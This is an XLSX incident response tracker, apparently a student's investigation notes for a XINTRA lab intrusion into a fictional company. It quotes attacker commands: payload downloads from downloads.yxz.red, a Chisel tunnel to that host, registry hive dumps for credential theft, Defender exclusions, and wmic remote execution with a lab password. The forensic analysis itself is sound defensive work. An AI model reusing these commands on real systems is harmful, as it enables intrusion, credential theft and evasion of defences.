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Lenovo\Documents\Courses\xintra\ttonik\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{FB8CFBF9-F00D-4AA9-A8B7-186A9EFF6232}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="14016" firstSheet="3" activeTab="3" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Intro" sheetId="1" r:id="rId1"/>
    <sheet name="Investigation Notes" sheetId="2" r:id="rId2"/>
    <sheet name="Contact Info" sheetId="3" r:id="rId3"/>
    <sheet name="Timeline" sheetId="4" r:id="rId4"/>
    <sheet name="Systems" sheetId="5" r:id="rId5"/>
    <sheet name="Accounts" sheetId="6" r:id="rId6"/>
    <sheet name="Network Indicators" sheetId="8" r:id="rId7"/>
    <sheet name="Host Indicators" sheetId="7" r:id="rId8"/>
    <sheet name="Memory Indicators" sheetId="14" r:id="rId9"/>
    <sheet name="Request &amp; Task Tracker" sheetId="9" r:id="rId10"/>
    <sheet name="Evidence Tracker" sheetId="10" r:id="rId11"/>
    <sheet name="Forensic Keywords" sheetId="11" r:id="rId12"/>
    <sheet name="Investigative Queries" sheetId="12" r:id="rId13"/>
    <sheet name="linux memory headers" sheetId="15" r:id="rId14"/>
  </sheets>
  <definedNames>
    <definedName name="Z_66395941_3122_440A_B522_6E95805F6823_.wvu.FilterData" localSheetId="4" hidden="1">Systems!$B$2:$N$26</definedName>
    <definedName name="Z_D8808D7D_FBA0_4346_9CD4_3452A3DBA6C5_.wvu.FilterData" localSheetId="4" hidden="1">Systems!$B$2:$N$12</definedName>
  </definedNames>
  <calcPr calcId="191029"/>
  <customWorkbookViews>
    <customWorkbookView name="Filter 1" guid="{66395941-3122-440A-B522-6E95805F6823}" maximized="1" windowWidth="0" windowHeight="0" activeSheetId="0"/>
    <customWorkbookView name="Filter 2" guid="{D8808D7D-FBA0-4346-9CD4-3452A3DBA6C5}" maximized="1" windowWidth="0" windowHeight="0" activeSheetId="0"/>
  </customWorkbookViews>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="991" uniqueCount="504">
  <si>
    <t>Introduction</t>
  </si>
  <si>
    <t>For URGENT Incident Response service requests, please contact:</t>
  </si>
  <si>
    <t>Americas/Canada</t>
  </si>
  <si>
    <t>(+1) 855 276 9347</t>
  </si>
  <si>
    <t>UK/Ireland</t>
  </si>
  <si>
    <t>(+44) 800 0487187</t>
  </si>
  <si>
    <t>France</t>
  </si>
  <si>
    <t>(+33) 801840073</t>
  </si>
  <si>
    <t>Germany</t>
  </si>
  <si>
    <t>(+49) 800 3252669</t>
  </si>
  <si>
    <t>Australia</t>
  </si>
  <si>
    <t>(+61) 1800 290 853</t>
  </si>
  <si>
    <t>Japan</t>
  </si>
  <si>
    <t>(+81) 800 170 5401</t>
  </si>
  <si>
    <t>India</t>
  </si>
  <si>
    <t>000 800 040 3447</t>
  </si>
  <si>
    <t>Saudi Arabia</t>
  </si>
  <si>
    <t>(+966) 800 880 3012</t>
  </si>
  <si>
    <t>UAE</t>
  </si>
  <si>
    <t>(+971) 8000 320 534</t>
  </si>
  <si>
    <t>Qatar</t>
  </si>
  <si>
    <t>(+974) 800 101 302</t>
  </si>
  <si>
    <t>Email</t>
  </si>
  <si>
    <t>services@crowdstrike.com</t>
  </si>
  <si>
    <t>Date Added</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Added by</t>
  </si>
  <si>
    <t xml:space="preserve">Use this tab to track investigation information such as related incident tickets, conference room/teleconference bridge details, etc.                        </t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Company/Firm</t>
  </si>
  <si>
    <t>Role/Title</t>
  </si>
  <si>
    <t>Email Address</t>
  </si>
  <si>
    <t>Phone</t>
  </si>
  <si>
    <t>Location/Time Zone</t>
  </si>
  <si>
    <t>Submitted By</t>
  </si>
  <si>
    <t>Status/Tag</t>
  </si>
  <si>
    <t>System Name</t>
  </si>
  <si>
    <t>Date/Time (UTC)</t>
  </si>
  <si>
    <t>Timestamp Type</t>
  </si>
  <si>
    <t>Activity</t>
  </si>
  <si>
    <t>Evidence Source</t>
  </si>
  <si>
    <t>Details/Comments</t>
  </si>
  <si>
    <t>ATT&amp;CK Alignment</t>
  </si>
  <si>
    <t>Size (bytes)</t>
  </si>
  <si>
    <t>Hash</t>
  </si>
  <si>
    <t>Owner/Account</t>
  </si>
  <si>
    <t>IP Address</t>
  </si>
  <si>
    <t>Domain</t>
  </si>
  <si>
    <t>System Role</t>
  </si>
  <si>
    <t>Operating System</t>
  </si>
  <si>
    <t>Initial Lead</t>
  </si>
  <si>
    <t>Significant Findings</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Earliest Evidence (UTC)</t>
  </si>
  <si>
    <t>Latest Evidence (UTC)</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Account ID</t>
  </si>
  <si>
    <t>Account Name</t>
  </si>
  <si>
    <t>SID</t>
  </si>
  <si>
    <t>Account Role</t>
  </si>
  <si>
    <t>AI-1</t>
  </si>
  <si>
    <t>AI-2</t>
  </si>
  <si>
    <t>AI-3</t>
  </si>
  <si>
    <t>AI-4</t>
  </si>
  <si>
    <t>AI-5</t>
  </si>
  <si>
    <t>AI-6</t>
  </si>
  <si>
    <t>AI-7</t>
  </si>
  <si>
    <t>AI-8</t>
  </si>
  <si>
    <t>AI-9</t>
  </si>
  <si>
    <t>AI-10</t>
  </si>
  <si>
    <t>Indicator ID</t>
  </si>
  <si>
    <t xml:space="preserve">Indicator Type </t>
  </si>
  <si>
    <t>Indicator</t>
  </si>
  <si>
    <t>Full Path</t>
  </si>
  <si>
    <t>SHA256</t>
  </si>
  <si>
    <t>SHA1</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>Type / Purpose</t>
  </si>
  <si>
    <t>HI-1</t>
  </si>
  <si>
    <t>HI-2</t>
  </si>
  <si>
    <t>HI-3</t>
  </si>
  <si>
    <t>HI-4</t>
  </si>
  <si>
    <t>HI-5</t>
  </si>
  <si>
    <t>HI-6</t>
  </si>
  <si>
    <t>HI-7</t>
  </si>
  <si>
    <t>HI-8</t>
  </si>
  <si>
    <t>HI-9</t>
  </si>
  <si>
    <t>HI-10</t>
  </si>
  <si>
    <t>Indicator Type</t>
  </si>
  <si>
    <t>NI-1</t>
  </si>
  <si>
    <t>NI-2</t>
  </si>
  <si>
    <t>NI-3</t>
  </si>
  <si>
    <t>NI-4</t>
  </si>
  <si>
    <t>NI-5</t>
  </si>
  <si>
    <t>NI-6</t>
  </si>
  <si>
    <t>NI-7</t>
  </si>
  <si>
    <t>NI-8</t>
  </si>
  <si>
    <t>NI-9</t>
  </si>
  <si>
    <t>NI-10</t>
  </si>
  <si>
    <t>Priority</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Work Stream</t>
  </si>
  <si>
    <t>Request / Task</t>
  </si>
  <si>
    <t>Significant Updates</t>
  </si>
  <si>
    <t>Assigned To</t>
  </si>
  <si>
    <t>Date Updated</t>
  </si>
  <si>
    <t>Date Completed</t>
  </si>
  <si>
    <t>RT-001</t>
  </si>
  <si>
    <t>RT-002</t>
  </si>
  <si>
    <t>RT-003</t>
  </si>
  <si>
    <t>RT-004</t>
  </si>
  <si>
    <t>RT-005</t>
  </si>
  <si>
    <t>RT-006</t>
  </si>
  <si>
    <t>RT-007</t>
  </si>
  <si>
    <t>RT-008</t>
  </si>
  <si>
    <t>RT-009</t>
  </si>
  <si>
    <t>RT-010</t>
  </si>
  <si>
    <t>RT-011</t>
  </si>
  <si>
    <t>RT-012</t>
  </si>
  <si>
    <t>RT-013</t>
  </si>
  <si>
    <t>RT-014</t>
  </si>
  <si>
    <t>RT-015</t>
  </si>
  <si>
    <t>Evidence ID</t>
  </si>
  <si>
    <t>Evidence Type</t>
  </si>
  <si>
    <t>Date Received</t>
  </si>
  <si>
    <t>Data Received</t>
  </si>
  <si>
    <t>Evidence Date (or Date Range)</t>
  </si>
  <si>
    <t>Evidence Location</t>
  </si>
  <si>
    <t>E-001</t>
  </si>
  <si>
    <t>E-002</t>
  </si>
  <si>
    <t>E-003</t>
  </si>
  <si>
    <t>E-004</t>
  </si>
  <si>
    <t>E-005</t>
  </si>
  <si>
    <t>E-006</t>
  </si>
  <si>
    <t>E-007</t>
  </si>
  <si>
    <t>E-008</t>
  </si>
  <si>
    <t>E-009</t>
  </si>
  <si>
    <t>E-010</t>
  </si>
  <si>
    <t>E-011</t>
  </si>
  <si>
    <t>E-012</t>
  </si>
  <si>
    <t>E-013</t>
  </si>
  <si>
    <t>E-014</t>
  </si>
  <si>
    <t>E-015</t>
  </si>
  <si>
    <t>Keyword ID</t>
  </si>
  <si>
    <t>High Fidelity Forensic Keywords</t>
  </si>
  <si>
    <t>K-1</t>
  </si>
  <si>
    <t xml:space="preserve">Use this tab to track incident-specific keywords to facilitate forensic analysis. </t>
  </si>
  <si>
    <t>K-2</t>
  </si>
  <si>
    <t>K-3</t>
  </si>
  <si>
    <t>K-4</t>
  </si>
  <si>
    <t>K-5</t>
  </si>
  <si>
    <t>K-6</t>
  </si>
  <si>
    <t>K-7</t>
  </si>
  <si>
    <t>K-8</t>
  </si>
  <si>
    <t>K-9</t>
  </si>
  <si>
    <t>K-10</t>
  </si>
  <si>
    <t>K-11</t>
  </si>
  <si>
    <t>K-12</t>
  </si>
  <si>
    <t>K-13</t>
  </si>
  <si>
    <t>K-14</t>
  </si>
  <si>
    <t>K-15</t>
  </si>
  <si>
    <t>Query ID</t>
  </si>
  <si>
    <t>Added By</t>
  </si>
  <si>
    <t>Platform</t>
  </si>
  <si>
    <t>Purpose</t>
  </si>
  <si>
    <t>Query</t>
  </si>
  <si>
    <t>Q-1</t>
  </si>
  <si>
    <t xml:space="preserve">Use this tab to track incident-specific queries for SIEM / log correlation / investigative platforms to facilitate investigative analysis. </t>
  </si>
  <si>
    <t>Q-2</t>
  </si>
  <si>
    <t>Q-3</t>
  </si>
  <si>
    <t>Q-4</t>
  </si>
  <si>
    <t>Q-5</t>
  </si>
  <si>
    <t>Q-6</t>
  </si>
  <si>
    <t>Q-7</t>
  </si>
  <si>
    <t>Q-8</t>
  </si>
  <si>
    <t>Q-9</t>
  </si>
  <si>
    <t>Q-10</t>
  </si>
  <si>
    <t>Q-11</t>
  </si>
  <si>
    <t>Q-12</t>
  </si>
  <si>
    <t>Q-13</t>
  </si>
  <si>
    <t>Q-14</t>
  </si>
  <si>
    <t>Q-15</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>The CrowdStrike Incident Response Tracker is provided to the DFIR community by CrowdStrike Services for anyone that wishes to track data for an investigation. For more information about the reasons for and uses of this tracker, read this blog:</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color theme="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> https://www.crowdstrike.com/blog/crowdstrike-releases-digital-forensics-and-incident-response-tracker/</t>
    </r>
  </si>
  <si>
    <t>Experienced a Breach?</t>
  </si>
  <si>
    <t>MI-1</t>
  </si>
  <si>
    <t>MI-2</t>
  </si>
  <si>
    <t>MI-3</t>
  </si>
  <si>
    <t>MI-4</t>
  </si>
  <si>
    <t>MI-5</t>
  </si>
  <si>
    <t>MI-6</t>
  </si>
  <si>
    <t>MI-7</t>
  </si>
  <si>
    <t>MI-8</t>
  </si>
  <si>
    <t>MI-9</t>
  </si>
  <si>
    <t>MI-10</t>
  </si>
  <si>
    <t>Field</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Source Plugin(s)</t>
  </si>
  <si>
    <t>PID</t>
  </si>
  <si>
    <t>Process ID of the suspicious or analyzed process.</t>
  </si>
  <si>
    <t>linux_pslist, linux_psscan</t>
  </si>
  <si>
    <t>Use linux_pslist for active processes and linux_psscan to find hidden or terminated ones.</t>
  </si>
  <si>
    <t>PPID</t>
  </si>
  <si>
    <t>Parent Process ID. Helps identify the parent-child relationship of processes.</t>
  </si>
  <si>
    <t>Look for unexpected parent-child relationships, e.g., shell spawned by a web server.</t>
  </si>
  <si>
    <t>Command Line</t>
  </si>
  <si>
    <t>Full command line used to execute the process.</t>
  </si>
  <si>
    <t>linux_psaux, linux_bash</t>
  </si>
  <si>
    <t>linux_bash can recover executed commands from memory, useful for missing cmdlines.</t>
  </si>
  <si>
    <t>Executable Path</t>
  </si>
  <si>
    <t>Full path to the process's executable file.</t>
  </si>
  <si>
    <t>linux_pslist, linux_psaux</t>
  </si>
  <si>
    <t>Check for unusual paths or processes running from /tmp or /dev/shm.</t>
  </si>
  <si>
    <t>UID/GID</t>
  </si>
  <si>
    <t>User ID and Group ID associated with the process.</t>
  </si>
  <si>
    <t>Identify processes running as root or under unexpected user accounts.</t>
  </si>
  <si>
    <t>Creation Time</t>
  </si>
  <si>
    <t>Timestamp when the process was created.</t>
  </si>
  <si>
    <t>linux_pslist, linux_pstree</t>
  </si>
  <si>
    <t>Use to correlate process creation with known incident timestamps.</t>
  </si>
  <si>
    <t>Network Connections</t>
  </si>
  <si>
    <t>Active or listening network connections associated with the process.</t>
  </si>
  <si>
    <t>linux_netstat, linux_sockstat, linux_ifconfig</t>
  </si>
  <si>
    <t>Check for unexpected external connections or unusual ports.</t>
  </si>
  <si>
    <t>Open Files</t>
  </si>
  <si>
    <t>Files currently opened by the process.</t>
  </si>
  <si>
    <t>linux_lsof</t>
  </si>
  <si>
    <t>Useful for spotting access to sensitive files or libraries.</t>
  </si>
  <si>
    <t>Memory Mappings</t>
  </si>
  <si>
    <t>Memory regions mapped by the process.</t>
  </si>
  <si>
    <t>linux_proc_maps, linux_vma</t>
  </si>
  <si>
    <t>Investigate for signs of code injection or non-standard memory mappings.</t>
  </si>
  <si>
    <t>Loaded Modules</t>
  </si>
  <si>
    <t>Shared libraries or modules loaded by the process.</t>
  </si>
  <si>
    <t>linux_library_list, linux_proc_maps</t>
  </si>
  <si>
    <t>Check for unusual or malicious libraries.</t>
  </si>
  <si>
    <t>Hidden Process</t>
  </si>
  <si>
    <t>Indicates if the process is hidden or anomalous.</t>
  </si>
  <si>
    <t>linux_psscan, linux_hidden_processes</t>
  </si>
  <si>
    <t>Hidden processes often indicate rootkits or stealth malware.</t>
  </si>
  <si>
    <t>Process Tree</t>
  </si>
  <si>
    <t>Visual representation of parent-child relationships.</t>
  </si>
  <si>
    <t>linux_pstree</t>
  </si>
  <si>
    <t>Quickly identify suspicious process hierarchies or orphaned processes.</t>
  </si>
  <si>
    <t>Thread Count</t>
  </si>
  <si>
    <t>Number of threads used by the process.</t>
  </si>
  <si>
    <t>linux_threads, linux_pslist</t>
  </si>
  <si>
    <t>Excessive threads may indicate attempts to evade detection or heavy malicious activity.</t>
  </si>
  <si>
    <t>Process State</t>
  </si>
  <si>
    <t>Indicates if the process is running, sleeping, etc.</t>
  </si>
  <si>
    <t>linux_pslist</t>
  </si>
  <si>
    <t>Suspicious processes may stay in unusual states (e.g., zombie).</t>
  </si>
  <si>
    <t>Environment Variables</t>
  </si>
  <si>
    <t>Environment variables associated with the process.</t>
  </si>
  <si>
    <t>linux_envars</t>
  </si>
  <si>
    <t>Look for injected paths, credentials, or shell modifications.</t>
  </si>
  <si>
    <t>Malicious Indicators</t>
  </si>
  <si>
    <t>Observed behaviors or artifacts tied to known malware.</t>
  </si>
  <si>
    <t>Derived from multiple plugins</t>
  </si>
  <si>
    <t>Include IOCs (e.g., command-line args, memory strings, connections).</t>
  </si>
  <si>
    <t>/var/log/nginx/access.log</t>
  </si>
  <si>
    <t>/admin/pluginUpload.html</t>
  </si>
  <si>
    <t>44.222.89[.]156</t>
  </si>
  <si>
    <t>attacker IP</t>
  </si>
  <si>
    <t>IP</t>
  </si>
  <si>
    <t>TTK-PRX-01</t>
  </si>
  <si>
    <t>TTK-DEV-01</t>
  </si>
  <si>
    <t>Event ID 4776</t>
  </si>
  <si>
    <t>The computer attempted to validate the credentials for an account.
Authentication Package:	MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account:	stanley.eugene
Source Workstation:	DESKTOP-WAIFU
Error Code:	0x0</t>
  </si>
  <si>
    <t>Event ID 4624</t>
  </si>
  <si>
    <t>TTK-PC-01</t>
  </si>
  <si>
    <t>An account was successfully logged on.
Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0
Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		No
Impersonation Level:		Impersonation
New Logon:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1121
	Account Name:		stanley.eugene
	Account Domain:		techtonik
	Logon ID:		0x7AF362
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}
Process Information:
	Process ID:		0x0
	Process Name:		-
Network Information:
	Workstation Name:	DESKTOP-WAIFU
	Source Network Address:	10.0.1.4
	Source Port:		0
Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only): NTLM V2
	Key Length:		128</t>
  </si>
  <si>
    <t>wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O lp.sh</t>
  </si>
  <si>
    <t>bash history</t>
  </si>
  <si>
    <t>teamcity user</t>
  </si>
  <si>
    <t>TTK-FS-01</t>
  </si>
  <si>
    <t>Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes
Impersonation Level:		Impersonation
New Logon:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1121
	Account Name:		stanley.eugene
	Account Domain:		techtonik
	Logon ID:		0xE2BCF4
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}
Process Information:
	Process ID:		0x0
	Process Name:		-
Network Information:
	Workstation Name:	ttk-dev-01
	Source Network Address:	10.0.1.5
	Source Port:		37250
Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		128</t>
  </si>
  <si>
    <t>DESKTOP-WAIFU</t>
  </si>
  <si>
    <t>Source Workstation:	DESKTOP-WAIFU\</t>
  </si>
  <si>
    <t>Hostname</t>
  </si>
  <si>
    <t>security 4697/System 7045</t>
  </si>
  <si>
    <t xml:space="preserve">	
A service was installed in the system.
Service Name:  CodeDebugService
Service File Name:  C:\Code\systoolkit\cmd.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem</t>
  </si>
  <si>
    <t>SYSTEM starts to perform network discovery using powershell 4940 -&gt; whoami, netstat, ping, etc</t>
  </si>
  <si>
    <t>SYSTEM removes control prohibiting LMv1 and LMv2 hashes:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f</t>
  </si>
  <si>
    <t>sysmon 1</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f</t>
  </si>
  <si>
    <t>sysmon 11</t>
  </si>
  <si>
    <t>TargetFilename: C:\Windows\Temp\1</t>
  </si>
  <si>
    <t>C:\Code\systoolkit\rr.exe</t>
  </si>
  <si>
    <t>TargetFilename: C:\Code\systoolkit\SearchIndexer.exe</t>
  </si>
  <si>
    <t>mimikatz</t>
  </si>
  <si>
    <t>C:\Code\systoolkit\msrdc.exe</t>
  </si>
  <si>
    <t>CommandLine: /c rr.exe client downloads.yxz.red:56969 R:socks
CurrentDirectory: C:\Code\systoolkit\
User: NT AUTHORITY\SYSTEM
LogonGuid: {2a2df5be-987b-6650-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA1=DED8FD7F36417F66EB6ADA10E0C0D7C0022986E9,MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18</t>
  </si>
  <si>
    <t>CommandLine: /c rr.exe client downloads.yxz.red:56969 R:socks (question 4-5)</t>
  </si>
  <si>
    <t>System 7045</t>
  </si>
  <si>
    <t>security 4697</t>
  </si>
  <si>
    <t>PS 4104</t>
  </si>
  <si>
    <t>Powershell execution Set-Mp-Preference used to add exclusions</t>
  </si>
  <si>
    <t>exclusions added to C:\Windows\temp, C:\Windows\System32, C:\Windows\WinStore</t>
  </si>
  <si>
    <t>iwr http://downloads.yxz.red:8080/msrdc.exe -OutFile msrdc.exe</t>
  </si>
  <si>
    <t>NOT actually ms rdp client</t>
  </si>
  <si>
    <t>https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md</t>
  </si>
  <si>
    <t>.\msrdc.exe -lolbas notcolor &gt; debug.log (winpeas)</t>
  </si>
  <si>
    <t>TTK-DC-01</t>
  </si>
  <si>
    <t>TTK-SQL-01</t>
  </si>
  <si>
    <t>sysmon 22</t>
  </si>
  <si>
    <t>techtonik\lindon.renae</t>
  </si>
  <si>
    <t>sysmon 3</t>
  </si>
  <si>
    <t>techtonik\ttkadmin</t>
  </si>
  <si>
    <t>sumatrapdf.exe connection to 44.222.89.156:443</t>
  </si>
  <si>
    <t>C:\Windows\Temp\cmd.exe connection to 44.222.89.156:443</t>
  </si>
  <si>
    <t>DNS request: C:\Users\lindon.renae\AppData\Local\SumatraPDF\SumatraPDF.exe to resolve  to 44.222.89.156</t>
  </si>
  <si>
    <t xml:space="preserve">CommandLine: "C:\Users\lindon.renae\AppData\Local\SumatraPDF\SumatraPDF.exe" </t>
  </si>
  <si>
    <t>sysmon 7</t>
  </si>
  <si>
    <t>File created C:\Windows\Temp\gdrv.sys</t>
  </si>
  <si>
    <t xml:space="preserve"> C:\Windows\Temp\ntkrnlmp.pdb and fltMgr.pdb</t>
  </si>
  <si>
    <t xml:space="preserve">Service installed 58MSKSSJ - </t>
  </si>
  <si>
    <t>system 7045</t>
  </si>
  <si>
    <t>gdrv.sys deleted by ttkadmin</t>
  </si>
  <si>
    <t>Process Information:
	New Process ID:		0x1ccc
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x1d80
	Creator Process Name:	C:\Windows\Temp\cmd.exe
	Process Command Line:	/c del C:\Windows\Temp\gdrv.sys</t>
  </si>
  <si>
    <t>security 4688</t>
  </si>
  <si>
    <t>rr.exe is Chisel - TCP/UDP tunnel over HTTP</t>
  </si>
  <si>
    <t>DLL side loading</t>
  </si>
  <si>
    <t>dwrite.dll DLL side loaded by sumatrapdf.exe</t>
  </si>
  <si>
    <t>sysmon 6</t>
  </si>
  <si>
    <t>malicious driver gdrv.sys loaded (T1068)</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t xml:space="preserve">LockApp.exe connection to 204.79.197.219:443, 20.150.38.228, 20.150.70.36, </t>
  </si>
  <si>
    <t>LockApp.exe process exited</t>
  </si>
  <si>
    <t>security 4689</t>
  </si>
  <si>
    <t xml:space="preserve">Lockapp.exe deleted by ttkadmin /c del C:\Windows\Temp\LockApp.exe </t>
  </si>
  <si>
    <t>ps 4104</t>
  </si>
  <si>
    <t>Set-MpPreference -ExclusionPath C:\Users\lindon.renae\AppData\Local\SumatraPDF</t>
  </si>
  <si>
    <t>Exclusion added by ttkadmin -ExclusionPath C:\Users\lindon.renae\AppData\Local\SumatraPDF</t>
  </si>
  <si>
    <t>Exclusion added by ttkadmin -ExclusionPath C:\Windows\Temp</t>
  </si>
  <si>
    <t>Set-MpPreference -ExclusionPath C:\Windows\Temp</t>
  </si>
  <si>
    <t>.\LockApp.exe --internet --kernelmode dump</t>
  </si>
  <si>
    <t>iwr http://downloads.yxz.red:8080/office/cmd.exe -OutFile cmd.exe</t>
  </si>
  <si>
    <t>mkdir C:\Windows\Temp\1</t>
  </si>
  <si>
    <t>techtonik\scavo.divya</t>
  </si>
  <si>
    <t>reg save HKLM\SAM sam.sa</t>
  </si>
  <si>
    <t>reg save HKLM\SECURITY sy.sa</t>
  </si>
  <si>
    <t>reg save HKLM\SYSTEM se.sa</t>
  </si>
  <si>
    <t>Compress-Archive -Path C:\Windows\temp\1\  -DestinationPath C:\Windows\temp\s.zip -Force</t>
  </si>
  <si>
    <t>reg save HKLM\SECURITY sy.bak</t>
  </si>
  <si>
    <t>archiveresources.psd1 launched</t>
  </si>
  <si>
    <t>files in C:\Windows\Temp\1 removed: rm *</t>
  </si>
  <si>
    <t>del .\s.zip</t>
  </si>
  <si>
    <t>sysmon 10</t>
  </si>
  <si>
    <t>Process accessed:
RuleName: technique_id=T1055.001,technique_name=Dynamic-link Library Injection
UtcTime: 2024-05-29 15:09:01.606
SourceProcessGUID: {bc9dcbae-0e88-6655-9017-000000000d00}
SourceProcessId: 5084
SourceThreadId: 9148
SourceImage: C:\Code\systoolkit\Word.exe
TargetProcessGUID: {bc9dcbae-450d-6657-ac22-000000000d00}
TargetProcessId: 7444
TargetImage: c:\windows\system32\cmd.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a1444|C:\Windows\System32\KERNELBASE.dll+4b342|C:\Windows\System32\KERNELBASE.dll+484c6|C:\Windows\System32\KERNEL32.DLL+1c5e3|UNKNOWN(0000016E818CF8A3)
SourceUser: techtonik\lindon.renae
TargetUser: techtonik\lindon.renae</t>
  </si>
  <si>
    <t>C:\Code\systoolkit\Word.exe -&gt; "C:\Windows\System32\cmd.exe" /c pwd</t>
  </si>
  <si>
    <t>/c wmic /node:"TTK-PC-01" /user:"TECHTONIK\scavo.divya" /password:"i.BHs_Pqd9vT@GpZ" process list brief</t>
  </si>
  <si>
    <t>/c wmic /node:"TTK-PC-02" /user:"TECHTONIK\scavo.divya" /password:"i.BHs_Pqd9vT@GpZ" process list brief</t>
  </si>
  <si>
    <t xml:space="preserve">/c wmic /node:"TTK-PC-02" /user:"TECHTONIK\scavo.divya" /password:"i.BHs_Pqd9vT@GpZ" process call create "cmd.exe /c mkdir C:\\Code" </t>
  </si>
  <si>
    <t xml:space="preserve">/c wmic /node:"TTK-PC-01" /user:"TECHTONIK\scavo.divya" /password:"i.BHs_Pqd9vT@GpZ" process call create "cmd.exe /c mkdir C:\\Code" </t>
  </si>
  <si>
    <t>C:\Code\adtoolkit\BackupScript.ps1</t>
  </si>
  <si>
    <t>TTK-PC-02</t>
  </si>
  <si>
    <t>-C Set-mppreference -ExclusionPath C:\Windows\Temp</t>
  </si>
  <si>
    <t xml:space="preserve">RCE from TKK-FS-01: </t>
  </si>
  <si>
    <t xml:space="preserve">credential dumping on TKK-PC-02 FROM TKK-FS-01) /c C:\Windows\Temp\mstrc.exe cookies </t>
  </si>
  <si>
    <t>/c C:\Windows\Temp\mstrc.exe logins</t>
  </si>
  <si>
    <t>Process Create:
RuleName: technique_id=T1204,technique_name=User Execution
UtcTime: 2024-05-30 09:16:29.543
ProcessGuid: {ca68c618-43ed-6658-1f02-000000001000}
ProcessId: 5784
Image: \\TTK-FS-01\Code\systoolkit\cmd.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: -
OriginalFileName: Cmd.exe
CommandLine: "Z:\systoolkit\cmd.exe" 
CurrentDirectory: Z:\systoolkit\
User: techtonik\scavo.divya
LogonGuid: {ca68c618-2696-6658-d9ae-110000000000}
LogonId: 0x11AED9
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=4C2568B4AB0E87650341919D7B822BDECAD55288,MD5=4BBDDF205DFDF3EC6666E754C01F716B,SHA256=836398C25B1ACD850ECAF5FCB5303F000033904829D5A5A28922B87DF9111A4E,IMPHASH=4F2F006E2ECF7172AD368F8289DC96C1
ParentProcessGuid: {ca68c618-269e-6658-c000-0</t>
  </si>
  <si>
    <t>sysmon 25</t>
  </si>
  <si>
    <t xml:space="preserve">Image: \\TTK-FS-01\Code\systoolkit\cmd.exe Type: Image is deleted -&gt; DISPLAYED AS "Z:\systoolkit\cmd.exe" </t>
  </si>
  <si>
    <t>Process Tampering:
RuleName: -
UtcTime: 2024-05-30 09:16:29.690
ProcessGuid: {ca68c618-43ed-6658-1f02-000000001000}
ProcessId: 5784
Image: \\TTK-FS-01\Code\systoolkit\cmd.exe
Type: Image is deleted
User: techtonik\scavo.divya</t>
  </si>
  <si>
    <t>Attacker tries again - defender locks image for access</t>
  </si>
  <si>
    <t>Process Tampering:
RuleName: -
UtcTime: 2024-05-30 09:18:05.194
ProcessGuid: {ca68c618-444a-6658-2402-000000001000}
ProcessId: 2872
Image: \\TTK-FS-01\Code\systoolkit\cmd.exe
Type: Image is locked for access
User: techtonik\scavo.divya</t>
  </si>
  <si>
